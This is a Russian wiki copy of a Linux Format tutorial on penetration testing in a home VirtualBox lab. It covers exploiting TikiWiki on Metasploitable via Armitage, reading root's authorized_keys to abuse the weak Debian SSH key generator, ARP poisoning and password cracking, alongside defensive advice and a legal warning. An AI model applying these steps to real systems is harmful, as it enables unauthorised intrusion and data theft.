LXF154:Изучите взлом
Olkol (обсуждение | вклад) (Новая страница: «Категория:Постоянные рубрики ==Изучите взлом== {{Врезка|left|Заголовок=Вкратце|Содерж…») |
Olkol (обсуждение | вклад) (→Изучите взлом) |
||
(не показаны 2 промежуточные версии 1 участника) | |||
Строка 3: | Строка 3: | ||
{{Врезка|left|Заголовок=Вкратце|Содержание= | {{Врезка|left|Заголовок=Вкратце|Содержание= | ||
− | Атака серверов | + | Атака серверов. Подбор паролей. Эксплойты. Взлом шифрования. Все, чтобы стать злодеем. |
|Ширина=40%}} | |Ширина=40%}} | ||
Строка 11: | Строка 11: | ||
Взлом, он же хак – это искусство получить доступ к запретной для вас компьютерной системе. Те, кто практикует взлом, используют ошибки и сбои в программах, чтобы заставить их работать не так, как они должны. Мы рассмотрим два применяемых ими метода и покажем, как не стать жертвой. Мы получим доступ администратора к системе, позволяющий нам делать все, что захочется – от кражи информации до стирания всей информации с дисков. | Взлом, он же хак – это искусство получить доступ к запретной для вас компьютерной системе. Те, кто практикует взлом, используют ошибки и сбои в программах, чтобы заставить их работать не так, как они должны. Мы рассмотрим два применяемых ими метода и покажем, как не стать жертвой. Мы получим доступ администратора к системе, позволяющий нам делать все, что захочется – от кражи информации до стирания всей информации с дисков. | ||
+ | {{Врезка|left|Заголовок=Вкратце|Содержание= | ||
+ | ==Взлом – искусство получить доступ к запретной компьютерной системе»== | ||
+ | |Ширина=40%}} | ||
+ | |||
Атаки реальны и нацелены на реальную систему Linux (хотя в нашем случае будет использована устаревшая система). [продолжение на стр. 26]Читайте, и вы узнаете, как взломщик может украсть данные или весь ваш компьютер – и как защитить свою систему. Чтобы защититься, надо знать, от чего защищаешься. | Атаки реальны и нацелены на реальную систему Linux (хотя в нашем случае будет использована устаревшая система). [продолжение на стр. 26]Читайте, и вы узнаете, как взломщик может украсть данные или весь ваш компьютер – и как защитить свою систему. Чтобы защититься, надо знать, от чего защищаешься. | ||
− | ===Атака на сервер | + | ==Шаг за шагом: Установка виртуальной сети== |
+ | ===1. Скачайте дистрибутив=== | ||
+ | |||
+ | Мы будем использовать BackTrack и Metasploitable. ISO-образ Backtrack 5 находится на www.backtrack-linux.org/downloads/, а образ Metasploitable для жесткого диска VirtualBox – на www.sourceforge.net/projects/virtualhacking/files/os/metasploitable/. | ||
+ | |||
+ | ===2. Запустите Virtualbox=== | ||
+ | |||
+ | Установите Virtualbox. В большинстве дистрибутивов должны быть пакеты для него; если в вашем их нет, установочные файлы можно взять на www.virtualbox.org. Зайдите в File > Preferences и выберите Network. Если список сетей пуст, нажмите на значок +, и появится сеть vboxnet0. | ||
+ | |||
+ | ===3. Создайте машину=== | ||
+ | |||
+ | Создайте новую машину под именем BackTrack. В качестве ОС выберите Linux, а версии – Ubuntu. Назначьте ей по крайней мере 730 МБ памяти, а на экране Virtual Hard Disk снимите галочку с Boot Hard Disk. На предупреждение ответьте Continue, затем нажмите Create. | ||
+ | |||
+ | ===4. Включите адаптеры=== | ||
+ | |||
+ | Щелкните правой кнопкой по New Virtual Machine и зайдите в Settings. Выберите Network, проверьте, что адаптер 1 – Enabled и Attached To NAT, а адаптер 2 – Enabled и Attached To Host-only Adapter. Дважды щелкните по машине. В мастере First Run, нажмите на BackTrack ISO (Чтобы занести в список CD/DVD Images, нажмите Add). В приглашении Boot нажмите ввод, и еще раз ввод, чтобы выбрать BackTrack Text – Default Boot Text Mode. | ||
+ | |||
+ | ===5.Приготовьте жертву=== | ||
+ | |||
+ | В командной строке введите startx, чтобы запустить оконный менеджер. Сейчас пора готовить машину-жертву – в окне VirtualBox нажмите New, чтобы создать новую виртуальную машину. Отдайте ей примерно четверть памяти вашего компьютера, а на экране Virtual Hard Disk щелкните по Use Existing Hard Disk и выберите Metasploitable.vmdk, который был разархивирован на первом шаге. | ||
+ | |||
+ | ===6. Пора вторгаться=== | ||
+ | |||
+ | Щелкните правой кнопкой по виртуальной машине Metasploitable и выберите Settings. В списке слева выберите System, затем на вкладке Motherboard включите Enable IO APIC, а на вкладке Processor – Enable PAE/NX. В Network, как в и BackTrack, выберите Host-only Adapter. Теперь дважды щелкните по виртуальной машине. Она загрузится в текстовый экран входа – насчет деталей входа не волнуйтесь: мы ведь будем осуществлять вторжение. | ||
+ | |||
+ | {{Врезка|left|Заголовок=Вирус|Содержание= | ||
+ | Пользователи Linux зачастую спокойно относятся к этим потенциально опасным программам. Широко распространено мнение, что эта проблема касается только компьютеров под Windows. Однако стоит помнить, что самый первый компьютерный червь (Morris Worm в ноябре 1988) заражал компьютеры как раз с Unix. | ||
+ | |||
+ | Вредоносные программы, конечно, куда большая проблема в Windows, чем в Linux, однако не следует считать Linux неприкосновенным. Несколько вирусов уже атаковали Linux, однако это в основном были эксперименты, а настоящие заражения встречались очень редко. Конечно, в любой момент может появиться новый вирус, и лучший способ подготовить вашу систему к этому – запустить современную антивирусную программу. | ||
+ | |||
+ | Решение, запускать ли антивирус, сводится к тому, насколько большой вред может быть причинен при нежелательном заражении. Если вы регулярно делаете резервные копии вашей системы и сможете восстановить ее после заражения, тогда выгода от запуска антивируса не перевешивает потребляемого им процессорного времени. | ||
+ | |||
+ | Запуск антивирусной программы важен в тех случаях, когда на компьютере расположены разделы Samba или почтовые серверы, к которым обращаются компьютеры с Windows, поскольку в этом случае вирусы могут перебраться дальше, не заразив хост с Linux. | ||
+ | |||
+ | Вполне возможно, что вирус Windows сможет заразить программы под Wine, и такие заражения в природе встречались. | ||
+ | |||
+ | В принципе, существует вероятность, что эти вирусы причинят вред файлам, расположенным вне диска C в Wine. При запуске исполняемых файлов Windows в Linux нужно соблюдать некоторые предосторожности, такие же, как при запуске программ в ОС от Microsoft: например, применять сканер на вирусы. | ||
+ | |||
+ | Если вам необходимо запустить подозрительную программу, вы можете изолировать ее от остальной части системы, установив ее в виртуальной машине. | ||
+ | |||
+ | '''«Ключ к самозащите – всегда применять заплатки безопасности.»''' | ||
+ | |Ширина=20%}} | ||
+ | {{Врезка|right|Заголовок=Социальная инженерия | ||
+ | |Содержание= | ||
+ | Безопасность компьютерной системы определяется самым слабым ее участком, и очень часто это пользователи. Социальная инженерия – это процесс подведения пользователей к разглашению информации, пригодной при взломе. Это могут быть подробности строения инфраструктуры сети, что позволит хакерам подобрать подходящую атаку, или мандаты на вход. | ||
+ | |||
+ | Особо хитрый способ социальной инженерии – Cross Site Scripting (XSS). Это когда хакер взламывает web-страницу, чтобы поместить на ней свою информацию, которая затем послужит капканом. В результате в домене организации появляется страница, не имеющая к ней никакого отношения: например, поддельная форма входа, отсылающая имена и пароли злоумышленникам. Существует пример запуска такой атаки в WebGoat. Чтобы избежать атак подобного типа, следует всегда вводить адрес сайта самим, а не переходить по ссылкам. | ||
+ | |Ширина=30%}} | ||
+ | |||
+ | |||
+ | ==Атака на сервер== | ||
Когда говорят о взломе, многие представляют человека за подключенным к сети компьютером, который атакует другой компьютер в сети и получает к нему доступ. Это мы понимаем под атакой сервера. Как средство взлома мы будем использовать дистрибутив BackTrack, специально заточенный под тесты вторжения (элегантное название взлома собственной системы). Образ диска виртуальной машины под названием Metasploitable, специально сделанный уязвимым для атак, будет нашей жертвой. | Когда говорят о взломе, многие представляют человека за подключенным к сети компьютером, который атакует другой компьютер в сети и получает к нему доступ. Это мы понимаем под атакой сервера. Как средство взлома мы будем использовать дистрибутив BackTrack, специально заточенный под тесты вторжения (элегантное название взлома собственной системы). Образ диска виртуальной машины под названием Metasploitable, специально сделанный уязвимым для атак, будет нашей жертвой. | ||
Строка 63: | Строка 117: | ||
192.168.56.102 | 192.168.56.102 | ||
− | + | {{Врезка|left|Заголовок=|Содержание= «Ключ к самозащите – | |
+ | всегда применять заплатки безопасности.» | ||
+ | |Ширина=20%}} | ||
– это IP-адрес сервера Metasploitable, можно войти на сервер, причем у вас будет доступ root, и вы сможете производить любые действия или красть любые данные. | – это IP-адрес сервера Metasploitable, можно войти на сервер, причем у вас будет доступ root, и вы сможете производить любые действия или красть любые данные. | ||
+ | |||
+ | {{Врезка|left|Заголовок=Только для дома...|Содержание= | ||
+ | |||
+ | Давайте сразу уясним: взлом компьютерной системы незаконен. В действительности, чтобы попасть в неприятность, вам даже не обязательно причинять ущерб или воровать данные. В большинстве стран даже простая попытка проникновения в систему – серьезное нарушение. | ||
+ | |||
+ | К счастью, как показывают примеры этой статьи, виртуализация позволяет нам тестировать наши технологии вторжения на одном компьютере. Если у вас есть домашняя сеть, вы можете просто настроить ее подобным образом и опробовать все это на нескольких компьютерах. Испытания подобных атак помогут вам перестать быть жертвой. | ||
+ | |||
+ | Однако если вы попробуете эти технологии на настоящих серверах без письменного разрешения от владельца, вы подвергнетесь серьезному преследованию со стороны закона. Просто не делайте этого. | ||
+ | |Ширина=20%}} | ||
+ | |||
===Защитите себя=== | ===Защитите себя=== | ||
Строка 81: | Строка 147: | ||
В некоторых дистрибутивах (например, Ubuntu) у пользователя есть возможность зашифровать свой домашний каталог. То есть если вы загрузитесь с live-дистрибутива, в корневом разделе вы увидите общие данные, но не файлы пользователя. До сих пор еще неизвестны взломы современных алгоритмов шифрования, но это не значит, что у нас нет возможности проникнуть к данным; задача просто становится более хитрой. Сейчас мы приведем на компьютер троянского коня, что позволит нам получить доступ к файлам после того, как пользователь примонтирует раздел. | В некоторых дистрибутивах (например, Ubuntu) у пользователя есть возможность зашифровать свой домашний каталог. То есть если вы загрузитесь с live-дистрибутива, в корневом разделе вы увидите общие данные, но не файлы пользователя. До сих пор еще неизвестны взломы современных алгоритмов шифрования, но это не значит, что у нас нет возможности проникнуть к данным; задача просто становится более хитрой. Сейчас мы приведем на компьютер троянского коня, что позволит нам получить доступ к файлам после того, как пользователь примонтирует раздел. | ||
+ | {{Врезка|left|Заголовок=Вкратце|Содержание= | ||
+ | «Получив физический доступ к компьютеру, извлечь | ||
+ | из него данные просто.»|Ширина=20%}} | ||
Это можно попытаться проделать с использованием VirtualBox. Наши шаги работают с Ubuntu в качестве дистрибутива-жертвы, и BackTrack – дистрибутива хакера, но можете взять и другие, если в них есть соответствующие возможности. У жертвы должен быть зашифрованный домашний каталог, а атакующей системе требуется Metasploit Framework. Сначала создайте виртуальную машину с установленной последней версией Ubuntu и позаботьтесь, чтобы на этапе создания пользователя было выбрано Encrypt My Home Folder. Сетевой адаптер машины должен быть установлен Host-only. | Это можно попытаться проделать с использованием VirtualBox. Наши шаги работают с Ubuntu в качестве дистрибутива-жертвы, и BackTrack – дистрибутива хакера, но можете взять и другие, если в них есть соответствующие возможности. У жертвы должен быть зашифрованный домашний каталог, а атакующей системе требуется Metasploit Framework. Сначала создайте виртуальную машину с установленной последней версией Ubuntu и позаботьтесь, чтобы на этапе создания пользователя было выбрано Encrypt My Home Folder. Сетевой адаптер машины должен быть установлен Host-only. | ||
Строка 125: | Строка 194: | ||
Можно предотвратить загрузку машины с live-дистрибутивом, удалив опции CD и USB из списка загрузки в BIOS, а затем установив пароль BIOS, чтобы взломщик не смог вернуть их обратно. Более целенаправленный взломщик, тем не менее, способен вытащить привод из компьютера и подключить его к другому, где он сможет его примонтировать. Единственный способ полностью оградить себя от атаки такого вида – зашифровать жесткий диск целиком и задать хороший пароль. | Можно предотвратить загрузку машины с live-дистрибутивом, удалив опции CD и USB из списка загрузки в BIOS, а затем установив пароль BIOS, чтобы взломщик не смог вернуть их обратно. Более целенаправленный взломщик, тем не менее, способен вытащить привод из компьютера и подключить его к другому, где он сможет его примонтировать. Единственный способ полностью оградить себя от атаки такого вида – зашифровать жесткий диск целиком и задать хороший пароль. | ||
+ | {{Врезка|right|Заголовок=Вкратце|Содержание= | ||
+ | '''«Пароль из шести букв в нижнем регистре нужно подбирать 35 дней.»'''|Ширина=20%}} | ||
Большинство основных дистрибутивов поддерживают полное шифрование диска. Включение его при установке обычно достигается выбором опции Encrypted LVM на стадии разбивки диска. Пользователям Ubuntu придется для этого использовать альтернативный установочный CD, поскольку в обычной установке данная опция не поддерживается. Надо это вам или нет, зависит от вероятности попадания компьютера в руки взломщика и ценности информация на нем. Как правило, ноутбуки уязвимее настольных компьютеров, ведь их теряют и крадут намного чаще. | Большинство основных дистрибутивов поддерживают полное шифрование диска. Включение его при установке обычно достигается выбором опции Encrypted LVM на стадии разбивки диска. Пользователям Ubuntu придется для этого использовать альтернативный установочный CD, поскольку в обычной установке данная опция не поддерживается. Надо это вам или нет, зависит от вероятности попадания компьютера в руки взломщика и ценности информация на нем. Как правило, ноутбуки уязвимее настольных компьютеров, ведь их теряют и крадут намного чаще. | ||
Строка 135: | Строка 206: | ||
При неограниченном числе попыток можно подобрать любой пароль, однако хороший пароль подбирать настолько долго, что ко времени, когда взломщик его найдет, это утратит важность. Например, если перебирать 100 паролей в секунду, зная, что пароль – слово из словаря (Oxford English Dictionary содержит около 200 000 слов), то на отыскание пароля потребуется 2000 секунд, или 33 минуты. | При неограниченном числе попыток можно подобрать любой пароль, однако хороший пароль подбирать настолько долго, что ко времени, когда взломщик его найдет, это утратит важность. Например, если перебирать 100 паролей в секунду, зная, что пароль – слово из словаря (Oxford English Dictionary содержит около 200 000 слов), то на отыскание пароля потребуется 2000 секунд, или 33 минуты. | ||
+ | {{Врезка|right|Заголовок=Вкратце|Содержание= «Одна из самых универсальных утилит анализа | ||
+ | трафика – WireShark.» | ||
+ | |Ширина=40%}} | ||
+ | |||
Очевидно, нам хочется, чтобы наш пароль сопротивлялся дольше – значит, нужно быть менее предсказуемым. Если пароль – случайная строка символов, то число возможных комбинаций – это число возможных символов в степени их количества. Например, пятисимвольная строка из букв в нижнем регистре (26 вариантов) может быть любой из 26 * 26 * 26 * 26 * 26 = 11881376 возможных комбинаций. При той же скорости перебора это займет 118,814 секунд, или 33 часа. | Очевидно, нам хочется, чтобы наш пароль сопротивлялся дольше – значит, нужно быть менее предсказуемым. Если пароль – случайная строка символов, то число возможных комбинаций – это число возможных символов в степени их количества. Например, пятисимвольная строка из букв в нижнем регистре (26 вариантов) может быть любой из 26 * 26 * 26 * 26 * 26 = 11881376 возможных комбинаций. При той же скорости перебора это займет 118,814 секунд, или 33 часа. | ||
Строка 163: | Строка 238: | ||
Когда вы храните информацию на информацию на компьютере, вы можете ею управлять, устанавливать права доступа и записывать, какой именно пользователь произвел изменение данных. Однако как только информация покидает компьютер и путешествует по сети, вы теряете этот контроль. | Когда вы храните информацию на информацию на компьютере, вы можете ею управлять, устанавливать права доступа и записывать, какой именно пользователь произвел изменение данных. Однако как только информация покидает компьютер и путешествует по сети, вы теряете этот контроль. | ||
+ | |||
Сети – это открытые системы; компьютеры могут к ним подключаться и отключаться от них, и основные сетевые протоколы в своем дизайне поставили простоту превыше безопасности. Взломщик может использовать эту слабую сторону, чтобы надергать данных и даже управлять тем, что вы посылаете и получаете. Простейший способ это сделать – прослушивать данные, которые перемещаются по сети. Одна из самых универсальных утилит для анализа сетевого трафика [sniffer] – WireShark. После установки (либо через менеджер пакетов вашего дистрибутива, либо взяв файлы с www.wireshark.org), ее можно запустить командой | Сети – это открытые системы; компьютеры могут к ним подключаться и отключаться от них, и основные сетевые протоколы в своем дизайне поставили простоту превыше безопасности. Взломщик может использовать эту слабую сторону, чтобы надергать данных и даже управлять тем, что вы посылаете и получаете. Простейший способ это сделать – прослушивать данные, которые перемещаются по сети. Одна из самых универсальных утилит для анализа сетевого трафика [sniffer] – WireShark. После установки (либо через менеджер пакетов вашего дистрибутива, либо взяв файлы с www.wireshark.org), ее можно запустить командой | ||
Строка 191: | Строка 267: | ||
Можете запускать arp на машинах-жертвах. Если отравление ARP сработало, все IP-адреса будут указывать на один и тот же MAC-адрес. | Можете запускать arp на машинах-жертвах. Если отравление ARP сработало, все IP-адреса будут указывать на один и тот же MAC-адрес. | ||
+ | {{Врезка|right|Заголовок=Вкратце|Содержание= | ||
+ | Web-приложения – самые лакомые кусочки для хакерского взлома. Проект Open Web Application Security (OWASP) создал утилиту, которая демонстрирует потенциальные уязвимости в этой области. | ||
+ | |||
+ | WebGoat [от англ. scapegoat – «козел отпущения»] – это нарочито уязвимое web-приложение, с которым поставляется учебник по его взлому. Его можно скачать с code.google.com/p/webgoat/downloads/list; вам также потребуется web-прокси WebScarab, который лежит на www.sourceforge.net/projects/owasp/files/WebScarab. | ||
+ | |||
+ | Распаковав WebGoat (вам может потребоваться установить p7zip), перейдите в каталог и введите | ||
+ | |||
+ | sudo sh webgoat.sh start8080 | ||
+ | |||
+ | Затем запустите WebScarab командой | ||
+ | |||
+ | java -jar webscarab- | ||
+ | selfcontained-20070504-1631.jar | ||
+ | |||
+ | Другой способ – запустить их с live DVD, доступного на www.appseclive.org. Сервер запускается командой: | ||
+ | |||
+ | sudo webgoat start8080 | ||
+ | |||
+ | После этого WebScarab запускается из меню (OWASP > Proxies > OWASP WebScarab). | ||
+ | |||
+ | Для получения доступа к приложению, задайте web-браузеру адрес http://127.0.0.1:8080/webgoat/attack и для входа используйте guest/guest. | ||
+ | |||
+ | Чтобы увидеть данные в WebScarab, вам нужно приказать web-браузеру использовать прокси-сервер localhost на порте 8008 (предварительно убедившись, что все пункты в окне No Proxy For сняты). | ||
+ | |Ширина=40%}} | ||
Сейчас вы должны обнаружить, что через WireShark проходит больше информации. Вы можете даже использовать Ettercap, чтобы управлять сетью. Например, зайдя в View > Connections, вы увидите все TCP- и UDP-соединения в сети. Вы можете разорвать любое из них, выделив его и нажав Kill Connection. | Сейчас вы должны обнаружить, что через WireShark проходит больше информации. Вы можете даже использовать Ettercap, чтобы управлять сетью. Например, зайдя в View > Connections, вы увидите все TCP- и UDP-соединения в сети. Вы можете разорвать любое из них, выделив его и нажав Kill Connection. |
Текущая версия на 09:21, 24 июня 2018
|
|
|
Содержание |
[править] Изучите взлом
- Метамодернизм в позднем творчестве В.Г. Сорокина
- ЛитРПГ - последняя отрыжка постмодерна
- "Ричард III и семиотика"
- 3D-визуализация обложки Ridero создаем обложку книги при работе над самиздатом.
- Архитектура метамодерна - говоря о современном искусстве, невозможно не поговорить об архитектуре. В данной статье будет отмечено несколько интересных принципов, характерных для построек "новой волны", столь притягательных и скандальных.
- Литература
- Метамодерн
- Рокер-Прометей против изначального зла в «Песне про советскую милицию» Вени Дркина, Автор: Нина Ищенко, к.ф.н, член Союза Писателей ЛНР - перепубликация из журнала "Топос".
- Как избавиться от комаров? Лучшие типы ловушек.
- Что делать если роблокс вылетает на windows
- Что делать, если ребенок смотрит порно?
- Почему собака прыгает на людей при встрече?
- Какое масло лить в Задний дифференциал (мост) Visco diff 38434AA050
- О чем может рассказать хвост вашей кошки?
- Верветки
- Отчетность бюджетных учреждений при закупках по Закону № 223-ФЗ
- Срок исковой давности как правильно рассчитать
- Дмитрий Патрушев минсельхоз будет ли преемником Путина
- Кто такой Владислав Поздняков? Что такое "Мужское Государство" и почему его признали экстремистским в России?
- Как правильно выбрать машинное масло в Димитровграде?
- Как стать богатым и знаменитым в России?
- Почему фильм "Пипец" (Kick-Ass) стал популярен по всему миру?
- Как стать мудрецом?
- Как правильно установить FreeBSD
- Как стать таким как Путин?
- Где лучше жить - в Димитровграде или в Ульяновске?
- Почему город Димитровград так называется?
- Что такое метамодерн?
- ВАЖНО! Временное ограничение движения автотранспортных средств в Димитровграде
- Тарифы на электроэнергию для майнеров предложено повысить
Бен Эверард поливает грязью защитную безопасность.
В компьютерной безопасности есть два правила: первое — не покупайте компьютер, а второе — если уж вы его купили, ни в коем случае не включайте его. Отступив от этих правил, вы нарываетесь на потенциальные проблемы. Ни одна система не защищена от хакеров на 100 %, однако если следовать нескольким простым шагам, то взломать вас станет намного сложнее.
Взлом, он же хак – это искусство получить доступ к запретной для вас компьютерной системе. Те, кто практикует взлом, используют ошибки и сбои в программах, чтобы заставить их работать не так, как они должны. Мы рассмотрим два применяемых ими метода и покажем, как не стать жертвой. Мы получим доступ администратора к системе, позволяющий нам делать все, что захочется – от кражи информации до стирания всей информации с дисков.
- Метамодернизм в позднем творчестве В.Г. Сорокина
- ЛитРПГ - последняя отрыжка постмодерна
- "Ричард III и семиотика"
- 3D-визуализация обложки Ridero создаем обложку книги при работе над самиздатом.
- Архитектура метамодерна - говоря о современном искусстве, невозможно не поговорить об архитектуре. В данной статье будет отмечено несколько интересных принципов, характерных для построек "новой волны", столь притягательных и скандальных.
- Литература
- Метамодерн
- Рокер-Прометей против изначального зла в «Песне про советскую милицию» Вени Дркина, Автор: Нина Ищенко, к.ф.н, член Союза Писателей ЛНР - перепубликация из журнала "Топос".
- Как избавиться от комаров? Лучшие типы ловушек.
- Что делать если роблокс вылетает на windows
- Что делать, если ребенок смотрит порно?
- Почему собака прыгает на людей при встрече?
- Какое масло лить в Задний дифференциал (мост) Visco diff 38434AA050
- О чем может рассказать хвост вашей кошки?
- Верветки
- Отчетность бюджетных учреждений при закупках по Закону № 223-ФЗ
- Срок исковой давности как правильно рассчитать
- Дмитрий Патрушев минсельхоз будет ли преемником Путина
- Кто такой Владислав Поздняков? Что такое "Мужское Государство" и почему его признали экстремистским в России?
- Как правильно выбрать машинное масло в Димитровграде?
- Как стать богатым и знаменитым в России?
- Почему фильм "Пипец" (Kick-Ass) стал популярен по всему миру?
- Как стать мудрецом?
- Как правильно установить FreeBSD
- Как стать таким как Путин?
- Где лучше жить - в Димитровграде или в Ульяновске?
- Почему город Димитровград так называется?
- Что такое метамодерн?
- ВАЖНО! Временное ограничение движения автотранспортных средств в Димитровграде
- Тарифы на электроэнергию для майнеров предложено повысить
Атаки реальны и нацелены на реальную систему Linux (хотя в нашем случае будет использована устаревшая система). [продолжение на стр. 26]Читайте, и вы узнаете, как взломщик может украсть данные или весь ваш компьютер – и как защитить свою систему. Чтобы защититься, надо знать, от чего защищаешься.
[править] Шаг за шагом: Установка виртуальной сети
[править] 1. Скачайте дистрибутив
Мы будем использовать BackTrack и Metasploitable. ISO-образ Backtrack 5 находится на www.backtrack-linux.org/downloads/, а образ Metasploitable для жесткого диска VirtualBox – на www.sourceforge.net/projects/virtualhacking/files/os/metasploitable/.
[править] 2. Запустите Virtualbox
Установите Virtualbox. В большинстве дистрибутивов должны быть пакеты для него; если в вашем их нет, установочные файлы можно взять на www.virtualbox.org. Зайдите в File > Preferences и выберите Network. Если список сетей пуст, нажмите на значок +, и появится сеть vboxnet0.
[править] 3. Создайте машину
Создайте новую машину под именем BackTrack. В качестве ОС выберите Linux, а версии – Ubuntu. Назначьте ей по крайней мере 730 МБ памяти, а на экране Virtual Hard Disk снимите галочку с Boot Hard Disk. На предупреждение ответьте Continue, затем нажмите Create.
[править] 4. Включите адаптеры
Щелкните правой кнопкой по New Virtual Machine и зайдите в Settings. Выберите Network, проверьте, что адаптер 1 – Enabled и Attached To NAT, а адаптер 2 – Enabled и Attached To Host-only Adapter. Дважды щелкните по машине. В мастере First Run, нажмите на BackTrack ISO (Чтобы занести в список CD/DVD Images, нажмите Add). В приглашении Boot нажмите ввод, и еще раз ввод, чтобы выбрать BackTrack Text – Default Boot Text Mode.
[править] 5.Приготовьте жертву
В командной строке введите startx, чтобы запустить оконный менеджер. Сейчас пора готовить машину-жертву – в окне VirtualBox нажмите New, чтобы создать новую виртуальную машину. Отдайте ей примерно четверть памяти вашего компьютера, а на экране Virtual Hard Disk щелкните по Use Existing Hard Disk и выберите Metasploitable.vmdk, который был разархивирован на первом шаге.
[править] 6. Пора вторгаться
Щелкните правой кнопкой по виртуальной машине Metasploitable и выберите Settings. В списке слева выберите System, затем на вкладке Motherboard включите Enable IO APIC, а на вкладке Processor – Enable PAE/NX. В Network, как в и BackTrack, выберите Host-only Adapter. Теперь дважды щелкните по виртуальной машине. Она загрузится в текстовый экран входа – насчет деталей входа не волнуйтесь: мы ведь будем осуществлять вторжение.
- Метамодернизм в позднем творчестве В.Г. Сорокина
- ЛитРПГ - последняя отрыжка постмодерна
- "Ричард III и семиотика"
- 3D-визуализация обложки Ridero создаем обложку книги при работе над самиздатом.
- Архитектура метамодерна - говоря о современном искусстве, невозможно не поговорить об архитектуре. В данной статье будет отмечено несколько интересных принципов, характерных для построек "новой волны", столь притягательных и скандальных.
- Литература
- Метамодерн
- Рокер-Прометей против изначального зла в «Песне про советскую милицию» Вени Дркина, Автор: Нина Ищенко, к.ф.н, член Союза Писателей ЛНР - перепубликация из журнала "Топос".
- Как избавиться от комаров? Лучшие типы ловушек.
- Что делать если роблокс вылетает на windows
- Что делать, если ребенок смотрит порно?
- Почему собака прыгает на людей при встрече?
- Какое масло лить в Задний дифференциал (мост) Visco diff 38434AA050
- О чем может рассказать хвост вашей кошки?
- Верветки
- Отчетность бюджетных учреждений при закупках по Закону № 223-ФЗ
- Срок исковой давности как правильно рассчитать
- Дмитрий Патрушев минсельхоз будет ли преемником Путина
- Кто такой Владислав Поздняков? Что такое "Мужское Государство" и почему его признали экстремистским в России?
- Как правильно выбрать машинное масло в Димитровграде?
- Как стать богатым и знаменитым в России?
- Почему фильм "Пипец" (Kick-Ass) стал популярен по всему миру?
- Как стать мудрецом?
- Как правильно установить FreeBSD
- Как стать таким как Путин?
- Где лучше жить - в Димитровграде или в Ульяновске?
- Почему город Димитровград так называется?
- Что такое метамодерн?
- ВАЖНО! Временное ограничение движения автотранспортных средств в Димитровграде
- Тарифы на электроэнергию для майнеров предложено повысить
- Метамодернизм в позднем творчестве В.Г. Сорокина
- ЛитРПГ - последняя отрыжка постмодерна
- "Ричард III и семиотика"
- 3D-визуализация обложки Ridero создаем обложку книги при работе над самиздатом.
- Архитектура метамодерна - говоря о современном искусстве, невозможно не поговорить об архитектуре. В данной статье будет отмечено несколько интересных принципов, характерных для построек "новой волны", столь притягательных и скандальных.
- Литература
- Метамодерн
- Рокер-Прометей против изначального зла в «Песне про советскую милицию» Вени Дркина, Автор: Нина Ищенко, к.ф.н, член Союза Писателей ЛНР - перепубликация из журнала "Топос".
- Как избавиться от комаров? Лучшие типы ловушек.
- Что делать если роблокс вылетает на windows
- Что делать, если ребенок смотрит порно?
- Почему собака прыгает на людей при встрече?
- Какое масло лить в Задний дифференциал (мост) Visco diff 38434AA050
- О чем может рассказать хвост вашей кошки?
- Верветки
- Отчетность бюджетных учреждений при закупках по Закону № 223-ФЗ
- Срок исковой давности как правильно рассчитать
- Дмитрий Патрушев минсельхоз будет ли преемником Путина
- Кто такой Владислав Поздняков? Что такое "Мужское Государство" и почему его признали экстремистским в России?
- Как правильно выбрать машинное масло в Димитровграде?
- Как стать богатым и знаменитым в России?
- Почему фильм "Пипец" (Kick-Ass) стал популярен по всему миру?
- Как стать мудрецом?
- Как правильно установить FreeBSD
- Как стать таким как Путин?
- Где лучше жить - в Димитровграде или в Ульяновске?
- Почему город Димитровград так называется?
- Что такое метамодерн?
- ВАЖНО! Временное ограничение движения автотранспортных средств в Димитровграде
- Тарифы на электроэнергию для майнеров предложено повысить
[править] Атака на сервер
Когда говорят о взломе, многие представляют человека за подключенным к сети компьютером, который атакует другой компьютер в сети и получает к нему доступ. Это мы понимаем под атакой сервера. Как средство взлома мы будем использовать дистрибутив BackTrack, специально заточенный под тесты вторжения (элегантное название взлома собственной системы). Образ диска виртуальной машины под названием Metasploitable, специально сделанный уязвимым для атак, будет нашей жертвой.
Metasploit Framework – система для сбора всех уязвимостей, дыр в безопасности, систем сканирования и рабочих нагрузок в одной посуде. Это утилита командной строки, но мы будем использовать ее через графический интерфейс. На машине BackTrack запустите Applications > BackTrack > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > Armitage. В новом окне нажмите Start MSF и подождите, когда откроется основное окно программы.
Перейдите в Hosts > Nmap Scan > Intense Scan и в ответ на запрос введите диапазон IP-адресов 192.168.56.0/24 (если вы меняли параметры DHCP-сервера VirtualBox, ваше значение будет другим) и подождите, пока программа не объявит о завершении сканирования.
При этом обнаружится четыре хоста: один для хостовой машины, один для DHCP-сервера, один для машины BackTrack и один – для сервера Metasploitable. Чтобы понять, какие атаки мы сможем провернуть на этих хостах, перейдите в Attacks > Find Attacks > By Port и подождите, пока не увидите сообщение Attack Analysis Complete. Самая сложная часть атаки на сервер – узнать, какую именно уязвимость нужно использовать. В нашем случае нам известно, что жертва запустила TikiWiki, где содержится уязвимость в PHP, позволяющая выполнить код нашего эксплойта.
Щелкните правой кнопкой по хосту Metasploitable (если вы не уверены, какой это хост, откройте терминал и введите ifconfig. Выведется IP-адрес текущей машины. Машина-хост будет иметь IP 192.168.56.1, у DHCP-сервера это 192.168.56.100, а оставшийся – у сервера Metasploitable) и перейдите в Attack > webapp > Tikiwiki_graph_formula_exec. Убедившись, что LHOST присвоен IP машины BackTrack, нажмите на запуск. После запуска эксплойта значок хоста должен стать красным, что знаменует успех операции. Снова щелкните правой кнопкой по значку хоста и выберите Shell > Interact. Откроется вкладка – минимальная оболочка, запущенная на машине-жертве. Для проверки введите whoami, и вы узнаете, что взломали пользователя www-data. Эта оболочка ограничена – вы не сможете использовать cd для перехода в другой каталог, однако некоторую информацию извлечь удастся. Например, запустив
ls /home
мы узнаем список пользователей системы. Metasploitable собран на Ubuntu 8.04, а в Ubuntu версий 7.04 – 8.04 существовала проблема генератора ключей SSH. Он создавал ключи с помощью генератора случайных чисел, однако для затравки генератора брался ID процесса. Поскольку количество процессов ограничено сверху числом 37 768, то и ключей вырабатывалось не больше. Это число довольно мало, и пробить ключ легко.
Прежде чем идти в атаку, нужно узнать, с какими открытыми ключами система пустит нас. Вернемся в оболочку Armitage и введем
cat /root/.ssh/authorized_keys
На выходе будет 2048-разрядный открытый ключ RSA, авторизованный для входа от имени root. Найди мы соответствующий закрытый ключ, мы бы смогли SSH’нуть в учетную запись root без пароля. Обычно здесь слишком много нужно проверять, но поскольку нам известна слабость генератора ключей, круг проверок сильно сужается.
